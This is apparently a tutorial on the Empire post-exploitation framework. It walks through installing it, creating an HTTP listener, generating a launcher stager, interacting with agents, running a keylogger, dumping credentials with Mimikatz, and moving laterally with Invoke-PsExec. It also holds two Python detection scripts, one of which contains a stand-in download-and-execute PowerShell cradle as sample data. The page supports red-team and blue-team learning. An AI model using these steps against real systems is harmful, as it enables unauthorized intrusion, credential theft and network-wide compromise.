Empire

Post-Exploitation Framework

📻 What is Empire?

Empire is a post-exploitation and adversary-simulation framework. It keeps control of compromised systems through agents (PowerShell and Python, plus C# in newer releases) that call back to a listener you run on your own infrastructure.

👉 It is one of the most widely used frameworks for red team operations and post-exploitation.

🔍 What Empire can do

C2 Communication

Establish command and control between the operator and the compromised hosts

Agent Deployment

Deploy PowerShell/Python agents

Module Execution

400+ post-exploitation modules

Lateral Movement

Spread to other hosts on the network

Persistence

Maintain access over time

Evasion Techniques

Avoid detection & AV bypass

⚙️ Installing Empire on Kali / Linux

Installation commands (from GitHub)

Clone Empire Repository

git clone https://github.com/BC-SECURITY/Empire.git

Go to Empire Directory

cd Empire

Install Dependencies

./setup/install.sh

Start Empire

./empire

👉 Note: use Empire 3.0 or later (the BC-SECURITY fork); the original EmpireProject repository is archived and no longer maintained. The single ./empire console shown above is the Empire 3.x interface; Empire 4 and later split it into ./ps-empire server and ./ps-empire client. On Kali the framework is also available as the powershell-empire package.

💻 Basic Commands (Usage)

👉 Commands typed in the Empire console (module commands such as usemodule are run from inside an agent session, after interact, or with the Agent option set):

List Listeners

listeners

Create HTTP Listener

uselistener http
set Host http://192.168.1.100
set Port 8080
execute

Generate PowerShell Stager

usestager windows/launcher_bat
set Listener http
execute

List Agents

agents

Interact with Agent

interact AGENT_NAME

List Available Modules

searchmodule mimikatz

Execute Module

usemodule powershell/credentials/mimikatz/logonpasswords
execute

🌐 Real Example (practical walkthrough)

🎯 Example: Complete Empire Workflow

Step 1: Start Empire Console

./empire

Step 2: Create Listener (C2 Server)

listeners
uselistener http
set Host http://10.10.10.1
set Port 8080
execute

Step 3: Generate Payload

usestager windows/launcher_bat
set Listener http
execute

👉 Run the generated payload (a .bat file written to the path in the stager's OutFile option) on the target system → the agent connects back to the listener. The .bat does nothing more than start powershell.exe with a base64-encoded launcher that downloads and runs the first stage from the listener's URL.
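To see what that .bat actually hands to the target, and to give the blue team a concrete check, here is an added example that is not code from this page or from the Empire project: a small Python triage function that pulls the base64 argument out of a PowerShell command line, decodes it as UTF-16LE the way powershell.exe does, and flags the combination of flags (no profile, STA, hidden window, encoded command) and download-cradle strings that Empire-style launchers show. The sample command line is constructed for this example; the host, port and URI path are assumptions chosen to match the listener above, and the encoded script is a stand-in, not a real Empire launcher.

```python
"""Triage a PowerShell command line for Empire-style launcher traits.

Added example for this page, run on constructed data; not Empire's own code.
Feed it process-creation telemetry (Sysmon Event ID 1, Security 4688).
"""
import base64
import re

# Launcher flags Empire's windows/launcher_* stagers pass to powershell.exe:
# no profile, single-threaded apartment, hidden window, base64 command.
FLAG_PATTERNS = {
    "noprofile": r"-nop\b|-noprofile\b",
    "sta": r"-sta\b",
    "hidden_window": r"-w(?:indowstyle)?\s+(?:1|hidden)\b",
    "encoded": r"-(?:encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{20,}",
}

# Strings the decoded launcher script tends to contain.
SCRIPT_PATTERNS = {
    "download_cradle": r"Net\.WebClient|DownloadString|DownloadData|Invoke-WebRequest",
    "invoke_expression": r"\bIEX\b|Invoke-Expression",
    "amsi_or_logging_tamper": r"AmsiUtils|amsiInitFailed|ScriptBlockLogging",
}


def decode_encoded_command(cmdline):
    """Return the script behind -enc/-EncodedCommand, or None if absent or undecodable."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        # powershell.exe expects base64 of the UTF-16LE encoded script text.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_command_line(cmdline):
    """Decode the command line and report which launcher traits it shows."""
    flags = sorted(n for n, p in FLAG_PATTERNS.items() if re.search(p, cmdline, re.I))
    script = decode_encoded_command(cmdline)
    indicators = []
    if script is not None:
        indicators = sorted(n for n, p in SCRIPT_PATTERNS.items() if re.search(p, script, re.I))
    # An encoded command alone is common in admin tooling; encoded plus hidden window /
    # no profile, or plus a download cradle, is the Empire launcher shape.
    suspicious = "encoded" in flags and (len(flags) >= 3 or bool(indicators))
    return {"flags": flags, "script": script, "indicators": indicators, "suspicious": suspicious}


# Constructed sample: a stand-in launcher script (host, port and URI are assumptions
# matching this page's walkthrough), wrapped the way launcher_bat wraps it.
# This is NOT a real Empire stager.
STAND_IN_SCRIPT = (
    "$wc=New-Object Net.WebClient;"
    "IEX $wc.DownloadString('http://10.10.10.1:8080/login/process.php')"
)
SAMPLE_LAUNCHER = "powershell -noP -sta -w 1 -enc " + base64.b64encode(
    STAND_IN_SCRIPT.encode("utf-16-le")
).decode()

# Constructed benign line for contrast: a scheduled maintenance script.
SAMPLE_BENIGN = r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"

if __name__ == "__main__":
    for line in (SAMPLE_LAUNCHER, SAMPLE_BENIGN):
        print(triage_command_line(line))
```

The decode step matters more than the flag match: Empire can rename the stager, change the listener profile and drop individual flags, but the encoded script still has to fetch and execute a second stage, so that is the part worth alerting on.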

🤖 Agent Management & Commands

When an agent connects, the console shows something like this (sample output; names and addresses are illustrative):

[*] Agent H7W8P9Q1 connected from 10.10.10.50
[+] Agent Name: H7W8P9Q1
[+] Computer: DESKTOP-WIN10
[+] Username: john
[+] Process ID: 4520
[+] High Integrity: True

Interact with Agent

interact H7W8P9Q1

Run Command on Target

shell whoami
shell ipconfig

Screenshot Capture

screenshot

Keylogger Start

usemodule powershell/collection/keylogger
execute

📊 Module Execution Example

Credential extraction with the Mimikatz module (run from inside the agent session):

(Empire: H7W8P9Q1) > usemodule powershell/credentials/mimikatz/logonpasswords
(Empire: powershell/credentials/mimikatz/logonpasswords) > execute
[+] Executing module on H7W8P9Q1...
[+] Tasked agent to run Mimikatz
Job started: 12
[+] Job completed
Username: Administrator
Domain: DESKTOP-WIN10
NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0
SHA1: a3f1c8e9b2d5f4a6c7e8d0f1a2b3c4d5

(Sample output; the values are illustrative only. Note that 31d6cfe0d16ae931b73c59d7e0c089c0 is the NTLM hash of an empty password, so a real hit like this would mean the account has no password rather than a hash worth passing, and a real SHA1 value is 40 hex characters, not 32.)

👉 What the credentials obtained through Empire are used for:

  • Lateral movement to other systems (pass-the-hash with the NTLM value)
  • Escalating to admin privileges
  • Accessing sensitive data
  • Maintaining persistence

🔥 Advanced Example - Lateral Movement

Invoke-PsExec for remote code execution

usemodule powershell/situational_awareness/network/powerview/get_group_member
execute

usemodule lateral_movement/invoke_psexec
set ComputerName DC01
set Listener http
execute

👉 Attack flow:

  • Recon: enumerate the members of Domain Admins (get_group_member's Identity option defaults to that group); find_localadmin_access in the same powerview folder lists hosts where the current user already has local admin, which is what invoke_psexec needs
  • PsExec: create a service on the remote host that runs the Empire launcher
  • Deploy: the new agent on that host calls back to the listener

👉 Each hop plants an Empire agent on the next system; repeated across the domain this ends in full network compromise. Two things to check before relying on it: invoke_psexec needs local admin on the target, because it creates and starts a service through the Service Control Manager, and that service creation is logged on the target as System Event ID 7045, so expect it to be noticed on monitored hosts.
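The PsExec-style pivot leaves a distinctive trail on the target: a network logon (Security Event ID 4624, logon type 3) followed within seconds by a service installation (System Event ID 7045) whose ImagePath is a command shell or PowerShell launcher rather than a normal service binary. Here is an added example of hunting for that pair; it is not Empire code and not a Windows API. It is a Python function over constructed event records: the field names mirror the Windows event fields, and the hosts, IPs, account and service name are assumptions made for this example (in practice the records come from Sysmon or a SIEM export).

```python
"""Hunt for PsExec-style remote service creation (the Invoke-PsExec artefact).

Added example for this page, run on constructed event records; not Empire code.
Field names mirror Windows event fields but are assumptions for this example.
"""
import re

# ImagePath values that are launchers, not service binaries: a cmd/COMSPEC wrapper,
# or powershell with an encoded command or window-style flag.
LAUNCHER_IMAGE_PATH = re.compile(
    r"%COMSPEC%|\bcmd(?:\.exe)?\s+/[cq]\b|powershell(?:\.exe)?[^\n]*-(?:enc|e|ec|w)\s",
    re.I,
)


def is_launcher_service(image_path):
    """True when a 7045 ImagePath looks like a one-shot launcher rather than a service."""
    return bool(LAUNCHER_IMAGE_PATH.search(image_path))


def find_remote_service_pivots(events, window_seconds=60):
    """Pair each suspicious 7045 with the most recent type-3 logon on that host.

    events: iterable of dicts with keys time (epoch seconds), host, id, user and,
    per event type, logon_type/src_ip (4624) or service/image_path (7045).
    Returns one alert dict per suspicious service install; pivot_source is None
    when no network logon by that account preceded it inside the window.
    """
    network_logons = {}  # (host, user) -> list of (time, src_ip)
    for ev in events:
        if ev["id"] == 4624 and ev.get("logon_type") == 3:
            network_logons.setdefault((ev["host"], ev["user"]), []).append((ev["time"], ev["src_ip"]))

    alerts = []
    for ev in events:
        if ev["id"] != 7045 or not is_launcher_service(ev["image_path"]):
            continue
        src_ip = None
        for t, ip in network_logons.get((ev["host"], ev["user"]), []):
            if 0 <= ev["time"] - t <= window_seconds:
                src_ip = ip  # the latest logon inside the window wins
        alerts.append({
            "host": ev["host"],
            "service": ev["service"],
            "user": ev["user"],
            "pivot_source": src_ip,
            "image_path": ev["image_path"],
        })
    return alerts


# Constructed sample records (not from a real system). The encoded payload is
# truncated on purpose; this block does not decode it.
SAMPLE_EVENTS = [
    {"time": 1000, "host": "DC01", "id": 4624, "user": "CORP\\jdoe", "logon_type": 3,
     "src_ip": "10.10.10.50"},
    {"time": 1004, "host": "DC01", "id": 7045, "user": "CORP\\jdoe", "service": "gHkJqWd",
     "image_path": "%COMSPEC% /C start /b powershell -noP -sta -w 1 -enc SQBFAFgA..."},
    {"time": 1300, "host": "FS01", "id": 7045, "user": "NT AUTHORITY\\SYSTEM", "service": "Sysmon64",
     "image_path": "C:\\Windows\\Sysmon64.exe"},
    {"time": 2000, "host": "WS07", "id": 4624, "user": "CORP\\jdoe", "logon_type": 2,
     "src_ip": "-"},
]

if __name__ == "__main__":
    for alert in find_remote_service_pivots(SAMPLE_EVENTS):
        print(alert)
```

Keying the correlation on host and account keeps the rule cheap and gives the responder the pivot source (the host the operator came from), which is the next place to look for an agent.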

⚠️ Important Warning

Use Empire only in environments you are authorized to test.

🚨 Critical Points:

  • High risk: a C2 framework like this can establish a persistent foothold on a network
  • Network spread: lateral movement can compromise the entire network
  • Authorization required: using it without written permission is illegal
  • Isolated lab: test on an isolated VM network

📌 Red team use: Empire is built for legitimate red team and security testing; malicious use is a crime.

🧩 Related Tools

Mimikatz

Credential extraction

Metasploit

Exploitation framework

Cobalt Strike

Commercial C2 framework

PowerSploit

PowerShell toolkit

💡 Simple way to think about it

Empire = "the pentester's remote control"

It gives you remote control over compromised systems. Once an agent is deployed you can run commands on the target, collect data, and spread across the whole network.